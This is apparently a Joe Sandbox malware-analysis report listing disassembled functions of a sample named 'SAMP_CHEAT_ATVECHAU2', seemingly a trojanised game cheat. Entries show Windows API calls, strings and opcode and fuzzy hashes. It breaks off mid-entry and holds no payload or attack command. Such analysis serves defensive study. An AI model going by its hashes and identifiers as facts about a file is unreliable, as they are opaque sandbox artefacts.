                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ObjectRelease$CapsDevice
                                                    • String ID: (
                                                    • API String ID: 1061551593-3887548279
                                                    • Opcode ID: 9c3100a1868716b67ef2a242d5cda87325b348ae007fa9424661c3704b82e1de
                                                    • Instruction ID: 2066c1c1ecb9e2807e1428b5c4cc270b5471e05ca7a370297f31e3e59fe47dd8
                                                    • Opcode Fuzzy Hash: 9c3100a1868716b67ef2a242d5cda87325b348ae007fa9424661c3704b82e1de
                                                    • Instruction Fuzzy Hash: FB91D471604354AFD720DF29D844A2BBBE8FFD9710F00491EF99AD7260DB70A946CB62
                                                    Function 00D1B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 00D1B324
                                                      • Part of subcall function 00D19097: IsProcessorFeaturePresent.KERNEL32(00000017,00D19086,00000050,00D23A34,?,00CFD710,00000004,00D31030,?,?,00D19093,00000000,00000000,00000000,00000000,00000000), ref: 00D19099
                                                      • Part of subcall function 00D19097: GetCurrentProcess.KERNEL32(C0000417,00D23A34,00000050,00D31030), ref: 00D190BB
                                                      • Part of subcall function 00D19097: TerminateProcess.KERNEL32(00000000), ref: 00D190C2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                    • String ID: *?$.
                                                    • API String ID: 2667617558-3972193922
                                                    • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                    • Instruction ID: baa9f4297638f96171674c527492b8552d27d23cd96964acfe33649b31709451
                                                    • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                    • Instruction Fuzzy Hash: 98518271E00209BFDF14DFA8D881AEDB7B5EF58320F24416AE854E7341EB319E858B60
                                                    Function 00CF75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF75E3
                                                      • Part of subcall function 00D005DA: _wcslen.LIBCMT ref: 00D005E0
                                                      • Part of subcall function 00CFA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CFA598
                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CF777F
                                                      • Part of subcall function 00CFA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CFA325,?,?,?,00CFA175,?,00000001,00000000,?,?), ref: 00CFA501
                                                      • Part of subcall function 00CFA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CFA325,?,?,?,00CFA175,?,00000001,00000000,?,?), ref: 00CFA532
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                    • String ID: :
                                                    • API String ID: 3226429890-336475711
                                                    • Opcode ID: 8080aaeb02b6100ce9ca2ec9033a26de72284b995d495fecd8f050382e5eb451
                                                    • Instruction ID: 3f629d87a93f54b8aba6574974d4196fc3e8bfd59047f03481bb54348e377766
                                                    • Opcode Fuzzy Hash: 8080aaeb02b6100ce9ca2ec9033a26de72284b995d495fecd8f050382e5eb451
                                                    • Instruction Fuzzy Hash: D9415C7180015CAAEF65EB64CC99EFEB778EF45300F0041A6B709A2192DB745F89DB72
                                                    Function 00D0B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _wcslen
                                                    • String ID: }
                                                    • API String ID: 176396367-4239843852
                                                    • Opcode ID: af17a164637507b663ef175e4a2f6f816be510b397940d2320439cdeb7ee681f
                                                    • Instruction ID: ce59ea3e09ab8f1c0dc1de2139e39c3d6f0647777ee76ec333bad85de7dff8ba
                                                    • Opcode Fuzzy Hash: af17a164637507b663ef175e4a2f6f816be510b397940d2320439cdeb7ee681f
                                                    • Instruction Fuzzy Hash: 1921D7729083165AD731DA64DC45F6AB3DCDF51764F08086BF548C3181EB65DD4883B2
                                                    Function 00CFF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00CFF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CFF2E4
                                                      • Part of subcall function 00CFF2C5: GetProcAddress.KERNEL32(00D381C8,CryptUnprotectMemory), ref: 00CFF2F4
                                                    • GetCurrentProcessId.KERNEL32(?,?,?,00CFF33E), ref: 00CFF3D2
                                                    Strings
                                                    • CryptUnprotectMemory failed, xrefs: 00CFF3CA
                                                    • CryptProtectMemory failed, xrefs: 00CFF389
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$CurrentProcess
                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                    • API String ID: 2190909847-396321323
                                                    • Opcode ID: 05944b39fe78e807c9334599178a31bb43b3b21cd1c4b5065422574bd65b0b1d
                                                    • Instruction ID: d4b19084feae29100142cc1141bd6a0670f91738d3c45eb0a3887c67f2861263
                                                    • Opcode Fuzzy Hash: 05944b39fe78e807c9334599178a31bb43b3b21cd1c4b5065422574bd65b0b1d
                                                    • Instruction Fuzzy Hash: BD112631A0132DABEF559F20DC42A7E3754FF10B20B10412EFE519B3A1DA74DE0B96A2
                                                    Function 00CFB991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _swprintf.LIBCMT ref: 00CFB9B8
                                                      • Part of subcall function 00CF4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF40A5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: __vswprintf_c_l_swprintf
                                                    • String ID: %c:\
                                                    • API String ID: 1543624204-3142399695
                                                    • Opcode ID: b4326200416f7f586aafd6c226aa90ddb7c53382a65129be309b32a3085b19a2
                                                    • Instruction ID: bfc8100a159af05b09361546b26d5627f33598524143404dc71c9d7cc72243b6
                                                    • Opcode Fuzzy Hash: b4326200416f7f586aafd6c226aa90ddb7c53382a65129be309b32a3085b19a2
                                                    • Instruction Fuzzy Hash: 4801F56350031679DAB06B35EC42D7BA7ACEF96770B40450AF658D6182EF30DD9492B2
                                                    Function 00D0101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateThread.KERNEL32(00000000,00010000,00D01160,?,00000000,00000000), ref: 00D01043
                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 00D0108A
                                                      • Part of subcall function 00CF6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF6C54
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Thread$CreatePriority__vswprintf_c_l
                                                    • String ID: CreateThread failed
                                                    • API String ID: 2655393344-3849766595
                                                    • Opcode ID: 6421361f51569ca3e22d8461fc35ac8c7c4935e76ecbc081c0aab3768468c032
                                                    • Instruction ID: 15db31f7492d01b5468ccf6913ad134d1a38f627851ba9bf5fc91642cd9c4b09
                                                    • Opcode Fuzzy Hash: 6421361f51569ca3e22d8461fc35ac8c7c4935e76ecbc081c0aab3768468c032
                                                    • Instruction Fuzzy Hash: 9001F9B934430A6FD3345F68AC92B7673A8EB50751F20042EF6CA922C0CAE168859635
                                                    Function 00CF1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00CFE2E8: _swprintf.LIBCMT ref: 00CFE30E
                                                      • Part of subcall function 00CFE2E8: _strlen.LIBCMT ref: 00CFE32F
                                                      • Part of subcall function 00CFE2E8: SetDlgItemTextW.USER32(?,00D2E274,?), ref: 00CFE38F
                                                      • Part of subcall function 00CFE2E8: GetWindowRect.USER32(?,?), ref: 00CFE3C9
                                                      • Part of subcall function 00CFE2E8: GetClientRect.USER32(?,?), ref: 00CFE3D5
                                                    • GetDlgItem.USER32(00000000,00003021), ref: 00CF135A
                                                    • SetWindowTextW.USER32(00000000,00D235F4), ref: 00CF1370
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                    • String ID: 0
                                                    • API String ID: 2622349952-4108050209
                                                    • Opcode ID: 210bd0090ed71933dd25aeba3f97f4c5f6a435d88ccf5e22340258007b2d807c
                                                    • Instruction ID: f423ea49cd679cda5338cbc278d1674516a4fa29418a531cfa1218475e39d599
                                                    • Opcode Fuzzy Hash: 210bd0090ed71933dd25aeba3f97f4c5f6a435d88ccf5e22340258007b2d807c
                                                    • Instruction Fuzzy Hash: 66F0AF3110438CEADF550F608C0DBFA3B58AF003A5F088514FE9890AB1DB78CA98EE21
                                                    Function 00D00FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00D01206,?), ref: 00D00FEA
                                                    • GetLastError.KERNEL32(?), ref: 00D00FF6
                                                      • Part of subcall function 00CF6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF6C54
                                                    Strings
                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00D00FFF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                    • API String ID: 1091760877-2248577382
                                                    • Opcode ID: d85c0894ededae30c94fd9765d071d630797315709165b62cb31806e4418945c
                                                    • Instruction ID: 7ba0639f58ab59933ab9d8d819f42b24da41a7983ad47e7ede5f0f41ff16e196
                                                    • Opcode Fuzzy Hash: d85c0894ededae30c94fd9765d071d630797315709165b62cb31806e4418945c
                                                    • Instruction Fuzzy Hash: 19D02E325482343AD6203724AD0AE7E3804AB32731F200704F2B8A23F6CA280D8262B2
                                                    Function 00CFE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00CFDA55,?), ref: 00CFE2A3
                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00CFDA55,?), ref: 00CFE2B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: FindHandleModuleResource
                                                    • String ID: RTL
                                                    • API String ID: 3537982541-834975271
                                                    • Opcode ID: f0e6a0b161d9df688d95adb9d877a95fdb2d8b6e6eed05e246c6a501f3b4433a
                                                    • Instruction ID: 8458882c163ecf3a662b8a1e98994a9c731d8e3fff68f154082cdba969c615b2
                                                    • Opcode Fuzzy Hash: f0e6a0b161d9df688d95adb9d877a95fdb2d8b6e6eed05e246c6a501f3b4433a
                                                    • Instruction Fuzzy Hash: 82C0123134071067E6302B647D0DB436A585B20B15F050458B281E92D1D6A9C64586B0

                                                    Executed Functions

                                                    Function 00007FFAAC580D48 Relevance: 6.5, Strings: 5, Instructions: 265COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: "9$5X_H$b4$r6$r6
                                                    • API String ID: 0-3501087565
                                                    • Opcode ID: 4cd2fd339d4fcb02c077742d31b3a38227c5b0fc8a5575973136437a36a5bc0b
                                                    • Instruction ID: b2cbed6911e76bedbda643fe113aa76de9a990ac7d63c11cf1b76c8ff6d46e76
                                                    • Opcode Fuzzy Hash: 4cd2fd339d4fcb02c077742d31b3a38227c5b0fc8a5575973136437a36a5bc0b
                                                    • Instruction Fuzzy Hash: C59104B5918A8A8FE789DB28C8657B97FE0EF96304F0440BAD00DD72D6DF781804CB81
                                                    Function 00007FFAAC580E43 Relevance: 3.9, Strings: 3, Instructions: 170COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: b4$r6$r6
                                                    • API String ID: 0-3183416175
                                                    • Opcode ID: a70eaa381b4e2be481645b65239253459a1859818ab5f2def76a7e7c97d5b148
                                                    • Instruction ID: b479a4c1cec51a9016cc0440b6fbf2c279284e28ffb813da3b8f8b759f298ffa
                                                    • Opcode Fuzzy Hash: a70eaa381b4e2be481645b65239253459a1859818ab5f2def76a7e7c97d5b148
                                                    • Instruction Fuzzy Hash: 20510FB1A28A4A8EE789DB18C86A7B97FE4EBD6314F04407ED00DD77D5CB781814CB80
                                                    Function 00007FFAAC98DAA2 Relevance: 4.1, Strings: 3, Instructions: 326COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6$r6$r6
                                                    • API String ID: 0-701349563
                                                    • Opcode ID: 799b14b05e3cceab26bb41339ae497e8590234ad723f2e1a5e1417a78b6485e2
                                                    • Instruction ID: 994b2ecc6289277140fa7bafb9081e11579b95edbbfa012c34ccbde4edd37e95
                                                    • Opcode Fuzzy Hash: 799b14b05e3cceab26bb41339ae497e8590234ad723f2e1a5e1417a78b6485e2
                                                    • Instruction Fuzzy Hash: 19C1BF75A19A478FE749DB28C0906B4B7E1FF5A300F5481B9D04ECBA86CB28F955CBC0
                                                    Function 00007FFAAC988BC2 Relevance: 4.1, Strings: 3, Instructions: 325COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6$r6$r6
                                                    • API String ID: 0-701349563
                                                    • Opcode ID: 4a26d59c5e52a6390ee5d29d5e84bf2bacfb840d54f4f82d9faf926b3652eb4d
                                                    • Instruction ID: 1efe3670829c103fcd9184c282ab60ad5a543bdb5a2c8f8c0e421365470fbc94
                                                    • Opcode Fuzzy Hash: 4a26d59c5e52a6390ee5d29d5e84bf2bacfb840d54f4f82d9faf926b3652eb4d
                                                    • Instruction Fuzzy Hash: 6EC1E374919A468FE349EB28C0906B4B7E1FF56300F448179D44EC7A87CB28F855CBE6
                                                    Function 00007FFAAC983C05 Relevance: 2.8, Strings: 2, Instructions: 286COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6$r6
                                                    • API String ID: 0-2018302956
                                                    • Opcode ID: 06f45ad5bfbeb9d6a762eceb1ae003b4538042e8efda30735488e459ebc3eecd
                                                    • Instruction ID: b5d48b6ae21bf492c66eb664630c26e341e69e0ab7f0229b250d3ecf4e5b960a
                                                    • Opcode Fuzzy Hash: 06f45ad5bfbeb9d6a762eceb1ae003b4538042e8efda30735488e459ebc3eecd
                                                    • Instruction Fuzzy Hash: 6AA1CE74909A8A8FE749DB28C0906B4BBA1FF56300F4481B9D44EC7A87DB38F955CBD0
                                                    Function 00007FFAAC989098 Relevance: 2.7, Strings: 2, Instructions: 154COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $r6
                                                    • API String ID: 0-2810495310
                                                    • Opcode ID: b610390f2496816455364661c65a19f8fced5ec289e0d65aa9a2785884b34b2e
                                                    • Instruction ID: aa5a9c338a2deadc2cb2d11f90c7551579ffab79e41886f64327c51ca7dca1b8
                                                    • Opcode Fuzzy Hash: b610390f2496816455364661c65a19f8fced5ec289e0d65aa9a2785884b34b2e
                                                    • Instruction Fuzzy Hash: 99515C74D0964ECFEB49CB98C4555BDB7B1FF4A300F1181BAD00EE7282CA35AA09CB90
                                                    Function 00007FFAAC98DF78 Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $r6
                                                    • API String ID: 0-2810495310
                                                    • Opcode ID: 0c6613b2b8f3d6a4baa0e058157283702ecb0d7c6b1d53c093791897f9c2f8fa
                                                    • Instruction ID: cec30fe8cadb7404d3b458a4bff2965cb3a8d1d95ce2feea062c90843960ae5a
                                                    • Opcode Fuzzy Hash: 0c6613b2b8f3d6a4baa0e058157283702ecb0d7c6b1d53c093791897f9c2f8fa
                                                    • Instruction Fuzzy Hash: 6B514F75D1964ECFEB49DB98C4555BDB7B1FF45300F1081BAD01EEB282CA38AA09CB91
                                                    Function 00007FFAAC984068 Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $r6
                                                    • API String ID: 0-2810495310
                                                    • Opcode ID: 02f88ebeffe39ea05b5139128acb91b8bb8da34b28e7f0325f944c44534722f6
                                                    • Instruction ID: 999135884a397c4d6d53e5e92046d1731d780714b18c81d17e1a19b2696bc206
                                                    • Opcode Fuzzy Hash: 02f88ebeffe39ea05b5139128acb91b8bb8da34b28e7f0325f944c44534722f6
                                                    • Instruction Fuzzy Hash: 74514F74D0964ACFEB49DFA8C4655BDBBB1EF55300F1081BAD01EE7286CE38A905CB91
                                                    Function 00007FFAAC98C9BD Relevance: 2.6, Strings: 2, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6$r6
                                                    • API String ID: 0-2018302956
                                                    • Opcode ID: 2fa0bd676b561fc58c5bdafa6740780138f1ca4ef0403f004865ee430339ea25
